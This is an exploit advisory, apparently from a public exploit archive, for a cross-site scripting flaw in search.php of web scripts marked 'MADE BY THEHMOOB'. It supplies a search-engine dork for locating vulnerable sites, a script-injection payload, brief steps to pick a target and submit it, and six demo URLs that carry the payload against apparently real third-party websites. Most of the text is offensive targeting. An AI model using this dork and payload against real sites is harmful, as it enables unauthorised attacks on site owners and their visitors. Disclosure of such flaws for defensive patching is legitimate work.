######################
# Exploit Title : ThehMoob Cross Site Scripting
# Exploit Author : Darkcrew.Org
# Google Dork : intext:"MADE BY THEHMOOB"
# Date: 15.06.2016
# Contact:sultan.ahmir1997@yandex.com
######################
# Vulnerable File : search.php
# Payload : "/></script><script>alert(/MirSultan/)</script>
# Describe : Search dork and select Target. Put /search.php After url such as :
# http://site.com/search.php
# Send data(Payload) with post method ... Ok
#
# Demo :
# http://www.superyoutube.com/search.php?q="/></script><script>alert(/MirSultan/)</script>
# http://www.topyoutubemp3.com/search.php?q="/></script><script>alert(/MirSultan/)</script>
# http://www.youfacebookclip.com/search.php?q="/></script><script>alert(/MirSultan/)</script>
# http://modernhmong.com/search.php?q="/></script><script>alert(/MirSultan/)</script>
# https://www.hmongtube.net/search.php?q="/></script><script>alert(/MirSultan/)</script>
# http://www.findplayclip.com/search.php?q="/></script><script>alert(/MirSultan/)</script>
#
#
######################
# discovered by : Batur-ı Mir Sultan
######################